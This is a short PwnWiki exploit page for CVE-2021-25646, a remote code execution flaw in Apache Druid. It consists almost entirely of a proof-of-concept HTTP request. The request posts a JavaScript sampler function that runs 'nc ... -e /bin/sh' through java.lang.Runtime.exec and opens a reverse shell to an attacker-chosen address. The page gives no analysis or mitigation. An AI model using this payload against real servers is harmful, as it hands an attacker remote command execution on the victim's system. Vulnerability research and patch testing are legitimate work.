CVE-2021-25646 Apache Druid JavaScript RCE漏洞

From PwnWiki
Revision as of 17:38, 18 March 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> ==POC== <pre> POST /druid/indexer/v1/sampler HTTP/1.1 ... ... {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.get...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

POST /druid/indexer/v1/sampler HTTP/1.1
...
...
 {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.1.10 5555 -e /bin/sh')}"
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-25646_Apache_Druid_JavaScript_RCE漏洞&oldid=405"